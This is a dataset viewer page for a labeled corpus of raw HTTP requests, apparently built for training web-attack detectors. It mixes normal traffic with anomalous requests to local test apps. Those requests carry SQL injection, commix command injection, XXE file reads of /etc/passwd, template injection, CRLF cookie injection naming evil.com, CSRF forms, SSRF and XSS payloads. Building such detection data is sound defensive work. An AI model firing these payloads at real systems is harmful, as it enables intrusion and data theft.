Dataset Viewer
Auto-converted to Parquet Duplicate
raw-request
stringlengths
20
82.8k
label
stringclasses
2 values
attack_type
stringclasses
17 values
GET /rest/products/search?q=%20%0aYUI=%24%28echo%20JGJRTX%29%0aYUI1=%24%7B%23YUI%7D%0aif%20%5B%201%20-eq%20%24YUI1%20%5D%0athen%20sleep%201%0afi%27 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Host: ...
anomalous
Command_Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: de0c9f71-aeff-48b1-9918-38b865128824
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate ...
anomalous
Cross_Site_Scripting
GET /manager/html HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Authorization: Basic UUNDOmoyZGVwbG95ZXI= Accept-Encoding: gzip Connection: close
anomalous
Advanced_Vulnerability_Scan
GET /rest/products/search?q=%2D%32%33%37%36%27%29%29%29%2F%2A%21%4F%72%2A%2F%34%33%37%33%3D%63%41%73%54%28%28%63%68%52%28%31%31%33%29%7C%7C%63%68%52%28%31%31%32%29%7C%7C%63%68%52%28%39%38%29%7C%7C%63%68%52%28%31%30%37%29%7C%7C%63%68%52%28%31%31%33%29%29%7C%7C%28%2F%2A%21%53%65%4C%45%43%54%2A%2F%28%2F%2A%21%43%61%53%45%...
anomalous
SQL_Injection
GET /vulnerabilities/sqli/?id=cookie-httponly HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/...
anomalous
Web_Cache_Deception
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x...
anomalous
Server_Side_Template_Injection
GET /?ref=a79af3d1-2143-4415-9d79-3c23e9e84cba&session_token=4823 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: a79af3d1-2143-44...
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/...
anomalous
Cross_Site_Request_Forgery
GET /vulnerabilities/sqli/?id={$smarty.version}}}// HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x...
anomalous
Server_Side_Template_Injection
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,im...
anomalous
CRLF_Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: a693633f-4d36-4e47-a87f-012657742ecd
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/...
anomalous
XML_External_Entity
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
Directory_Traversal
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-g...
anomalous
Web_Cache_Deception
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
Local_File_Inclusion
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-g...
anomalous
LDAP_Injection
GET /error/error.log HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip Connection: close
anomalous
Advanced_Vulnerability_Scan
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 8fb2abd3-055c-4067-9b65-6ad4a8d0f7aa
normal
none
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: f9f13f59-f2d0-42a7-95da-c637b4d86bf3
normal
none
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: dac034ee-5937-4b02-8541-d33dd447c880
normal
none
GET /vulnerabilities/sqli/?id=<p>Website Defaced! HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0....
anomalous
HTML_Injection
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,im...
anomalous
CRLF_Injection
GET /vulnerabilities/sqli/?id=dict://?0177.0.0.1:27017 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0...
anomalous
Server_Side_Request_Forgery
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzi...
anomalous
CRLF_Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 4990b49c-9e06-4525-aa4c-6a6797e1d8ee
normal
none
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: a662d5d1-7aa1-4217-b40f-b16ee1cf1e1e
normal
none
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzi...
anomalous
CRLF_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q...
anomalous
Local_File_Inclusion
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 ...
anomalous
LDAP_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
Directory_Traversal
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/...
anomalous
HTML_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Enc...
anomalous
Server_Side_Template_Injection
GET /login HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/16.2 Safari/537.36 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip
anomalous
Advanced_Vulnerability_Scan
GET /rest/products/search?q=%3Ch1%20style%3D%22color%3Ared%3Bfont-size%3A30px%3Bfont-weight%3Abold%3B%22%3EInjected%3C/h1%3E HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xm...
anomalous
HTML_Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: c10e6eba-8ad1-46f6-b471-59703d212c0a
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
HTML_Injection
GET /vulnerabilities/sqli/?id=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root> HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,...
anomalous
XML_External_Entity
GET /rest/products/search?q=fruit&cache_id=1f0e1584-523f-485d-a04f-0c20e7278806 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 1f...
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
Server_Side_Request_Forgery
GET /rest/products/search?q=shirt&cache_id=253fb785-bf38-42e7-a8e1-821174cda2d5 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 25...
normal
none
POST /FormLogin HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 Connection: close Content-Length: 70 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip Login=Administrator&Redirection=/Templates/Loginpage.html&Password=100
anomalous
Advanced_Vulnerability_Scan
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: <form action="/change-role%09" method="DELETE"><input type="hidden" name="csrf_token" value="admin%40evil.com"><input type="hidden" name="confirm_password" value="hacked"><input type="hidden" name="admin" value="delete`"><input type="hidden" name="password" value="ha...
anomalous
Cross_Site_Request_Forgery
GET /rest/products/search?q=/%2f%23%0a%250d%250aSet-Cookie:crlf=injection; domain=evil.com HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,...
anomalous
CRLF_Injection
GET /rest/products/search?q=%2D%32%39%33%38%22%29%29%2F%2A%21%6F%52%2A%2F%28%2F%2A%21%53%65%4C%65%63%74%2A%2F%28%2F%2A%21%63%61%53%65%2A%2F%2F%2A%21%77%48%65%6E%2A%2F%28%35%32%37%38%3D%35%32%37%38%29%2F%2A%21%74%68%45%6E%2A%2F%2F%2A%21%4E%75%6C%4C%2A%2F%2F%2A%21%45%6C%73%65%2A%2F%63%41%73%54%28%28%43%68%52%28%31%31%33%...
anomalous
SQL_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
Server_Side_Request_Forgery
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: <form action="/delete-account%20" method="PUT"><input type="hidden" name="new_password" value="eviluser"><input type="hidden" name="password" value="1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text...
anomalous
Cross_Site_Request_Forgery
GET /rest/products/search?q=%74%65%73%74%60%2F%2A%21%77%48%45%52%45%2A%2F%38%30%38%37%3D%38%30%38%37%2F%2A%21%41%6E%64%2A%2F%35%32%34%37%2F%2A%21%62%65%54%57%45%45%6E%2A%2F%35%32%34%37%2F%2A%21%41%6E%64%2A%2F%35%32%34%37%2D%2D%2F%2A%2A%2F%4F%65%58%70 HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT ...
anomalous
SQL_Injection
GET /rest/products/search?q=%20%7C%5B%204%20-ne%20%24%28echo%20EEWDBT%20%7Ctr%20-d%20%27%5Cn%27%7Cwc%20-c%29%20%5D%7C%7Csleep%201%7C%7C HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Host: localhost:30...
anomalous
Command_Injection
GET /?ref=87f75c21-e841-4be9-a56e-c0de3d2f6533&session_token=6095 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 87f75c21-e841-4b...
normal
none
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 9061ec21-6ae9-47de-ab50-d6a31ee6a4c7
normal
none
GET /vulnerabilities/sqli/?id=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY p2 SYSTEM "php://filter/convert.base64-encode/resource=/etc/mysql/my.cnf"> ]><svg>&p2;</svg> HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15...
anomalous
XML_External_Entity
GET /rest/products/search?q=%74%65%73%74%27%7C%7C%28%2F%2A%21%73%65%6C%45%63%54%2A%2F%51%42%6B%70%2F%2A%21%46%72%4F%6D%2A%2F%2F%2A%21%64%55%61%6C%2A%2F%2F%2A%21%77%68%45%72%65%2A%2F%39%31%39%39%3D%39%31%39%39%2F%2A%21%61%4E%64%2A%2F%35%35%37%39%2F%2A%21%62%65%54%57%45%45%4E%2A%2F%28%2F%2A%21%73%65%6C%45%63%54%2A%2F%2F%...
anomalous
SQL_Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 0b46c918-010b-41cc-b4e0-aebd86b237cc
normal
none
POST /p/u/doAuthentication.do HTTP/1.0 Host: localhost:3000 bleed_attack: 2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 5 login
anomalous
Advanced_Vulnerability_Scan
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
Server_Side_Request_Forgery
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: fd035ad2-c175-4013-985c-9d8caa8f95bb
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/...
anomalous
Directory_Traversal
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 606d2a5b-ab61-498a-8c16-94a7f1a5f2cb
normal
none
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 4c203f58-8b4a-4c88-9bc9-f9ab5abf34c7
normal
none
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 34c6bf77-6d1a-4eec-9743-4c7f65cf0110
normal
none
GET /rest/products/search?q=%20%3BYUI=%24%28echo%20MXXYQY%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%203%20-eq%20%24YUI1%20%5D%3Bthen%20sleep%201%3Bfi%7C%7C HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Hos...
anomalous
Command_Injection
GET /rest/products/search?q=";return(true);var xyz='a') HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzi...
anomalous
NoSQL_Injection
GET /vulnerabilities/sqli/?id=?page=+%0a%0dSet-Cookie:crlf=injection; Path=/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/htm...
anomalous
CRLF_Injection
GET /?ref=7199ceff-6d1e-4715-97cc-2587b7c7876f&session_token=6423 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 7199ceff-6d1e-47...
normal
none
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: d952469f-df3b-4c66-84b6-1158091aee44
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate ...
anomalous
Directory_Traversal
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: */* Accept-Language: en Accept-Encoding: gzip Connection: close
anomalous
Advanced_Vulnerability_Scan
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
Directory_Traversal
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: ${{{ ''.__class__.__mro__[1].__subclasses__() }}}}}%0d%0a Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Cha...
anomalous
Server_Side_Template_Injection
GET /rest/products/search?q=sale&cache_id=ca60fa01-5cd7-4548-af80-3f4ab24ebcab HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: ca6...
normal
none
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*...
anomalous
Server_Side_Request_Forgery
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 45af75ba-eb9f-4ca4-973a-6946c1e9147f
normal
none
GET /vulnerabilities/sqli/?id=<b style="position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);font-size:70px;color: HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cac...
anomalous
HTML_Injection
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: )(mail=*))(objectClass=*) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0....
anomalous
LDAP_Injection
GET /rest/products/search?q=<FRAMESET><FRAME SRC="javascript:javascript:alert(8641);"></FRAMESET> HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain...
anomalous
Cross_Site_Scripting
